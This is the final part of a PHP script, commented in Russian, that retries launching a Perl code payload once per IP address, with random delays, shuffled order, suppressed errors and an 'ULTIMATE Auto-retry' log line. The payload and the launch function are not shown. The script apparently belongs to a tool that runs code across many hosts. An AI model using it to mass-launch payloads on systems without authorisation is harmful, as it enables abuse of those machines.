// с другими IP или через некоторое время
// Пауза перед возможным повторным запуском
usleep(rand(2000000, 5000000)); // 2-5 секунд
// Опционально: автоматический рестарт для неудачных
if ($stats['failed'] > 0 && $stats['failed'] < $count) {
// Создаем массив только неудачных IP
$failed_ips = array();
foreach ($ips as $ip) {
if (!is_already_running($ip)) {
$failed_ips[] = $ip;
}
}
// Если есть неудачные - пробуем еще раз
if (!empty($failed_ips)) {
shuffle($failed_ips);
$retry_stats = array('started' => 0, 'skipped' => 0, 'failed' => 0);
foreach ($failed_ips as $ip) {
for ($attempt = 0; $attempt < MAX_RETRIES; $attempt++) {
if (launch_process($ip, $perl_code)) {
$retry_stats['started']++;
break;
}
usleep(rand(MIN_SLEEP, MAX_SLEEP));
}
if ($attempt >= MAX_RETRIES) {
$retry_stats['failed']++;
}
usleep(rand(MIN_SLEEP, MAX_SLEEP));
}
// Дополнительный вывод в лог
@error_log("ULTIMATE Auto-retry: " . json_encode($retry_stats));
}
}
// Завершаем работу
exit;
?>